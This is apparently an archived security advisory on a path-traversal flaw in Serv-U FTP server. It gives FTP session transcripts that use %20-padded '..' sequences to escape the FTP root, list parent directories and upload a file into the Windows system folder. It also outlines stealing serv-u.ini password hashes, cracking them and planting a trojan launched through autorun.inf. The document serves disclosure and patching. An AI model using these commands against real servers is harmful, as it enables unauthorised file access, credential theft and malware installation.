

    Serv-U FTP all versions


    Zoa Chien found following.   This was tested on: serv-U  ftp 2.4a,
    2.5h, 3.0beta,...  (all versions  ?)   Lets just  dump what author
    tried (skip this):

        Normal use: 1.txt is a file in the homedir.
        ftp> get 1.txt
        200 PORT Command successful.
        150 Opening ASCII mode data connection for 1.txt (7 bytes).
        226 Transfer complete.
        7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)

    Lets see what happens to hex codes: %2E=. %31=1 %20=space ...

        ftp> get 1%2etxt
        200 PORT Command successful.
        550 /1%2etxt: No such file or directory.
        --> %2e is not decoded
        ftp> get 1.%20txt
        200 PORT Command successful.
        550 /1. txt: No such file or directory.
        --> %20 is decoded to a space. (to be compatible with browsers)
        ftp> get %201.txt
        200 PORT Command successful.
        150 Opening ASCII mode data connection for 1.txt (7 bytes).
        226 Transfer complete.
        7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)
        --> hey, look if the space is in the beginning of the filename,
          it is just skipped.

    Lets try this on the cd command:

        ftp> cd \.a%20\
        550 /.a: No such file or directory.
        --> space is skipped again...
        ftp> cd \a%20a\
        550 /a a: No such file or directory.
        ftp> cd \a%20.\
        550 /a: No such file or directory.
        --> heh ? wtf, the %20 will remove the .

    Lets try to play around with that:

        ftp> cd \.%20.
        250 Directory changed to /Ftproot
        --> Hey, look the ftp client reveals the ftp dir... thats fun

    Lets keep playing

        ftp> cd \..%20.
        250 Directory changed to /..
        --> oh ow, this looks like trouble
        ftp> dir
        200 PORT Command successful.
        150 Opening ASCII mode data connection for /bin/ls.
        -rwxrwxrwx   1 user     group        1127 Nov 30 22:06 rootdir.txt
        226 Transfer complete.
        1180 bytes received in 0.00 seconds (1180000.00 Kbytes/sec)

    Ouch, that hurts...

        ftp> cd %20..%20%20../winnt\
        250 Directory changed to /c:/TOMB/../WINNT

    You can only use this when you are in your homedir.  You can  only
    use GET  ... when  you are  in your  homedir so  first changing to
    /winnt and then "get" will not work

        ftp> put autoexec.bat %20..%20%20../winnt/2.bat
        200 PORT Command successful.
        150 Opening ASCII mode data connection for 2.bat.
        226 Transfer complete.
        ftp> dir \..%20.\..%20.\winnt\

    Serv-U  ftp  will  reveal  the  full  path to the ftproot with: cd
    \.%20 (even  if "show  path relative  to home  dir"-option is  on)
    using pwd will work too, allow read/write/execute/list axx to  any
    other  file  on  the  partition   of  the  ftproot  if  you   have
    read/write/exec/list acces on your home dir (note that the  option
    inherit  subdirs  must  be  clicked  on  - otherwise "cd" will not

    Serv-U will allow  listing of hidden  files, even if  "hide hidden
    files is on" with  "DIR ."  The  exploit also works on  serv-U ftp
    2.4a...  but  you  might  have  to  use  a different string.:  dir

    This is a severe bug and  should be patched ASAP.  If  the ftproot
    is on the c:drive, serv-U.ini can be retrieved which contains  all
    passwords of the ftp users (and can be bruted forced with john the
    ripper).  That way, you could find logins that allow  executing...
    and you can upload and execute a trojan.

    Even if the ftproot  is not on the  same drive as serv-u.ini,  you
    can  still  upload  a  trojan  and  letting this trojan execute by
    using an autorun.inf on e.g.: d:\  with points to our trojan.   If
    the  sysadmin  uses  "My  Computer"  instead  of explorer.exe, the
    trojan will be executed.


    Upgrade to version 2.5i, available at: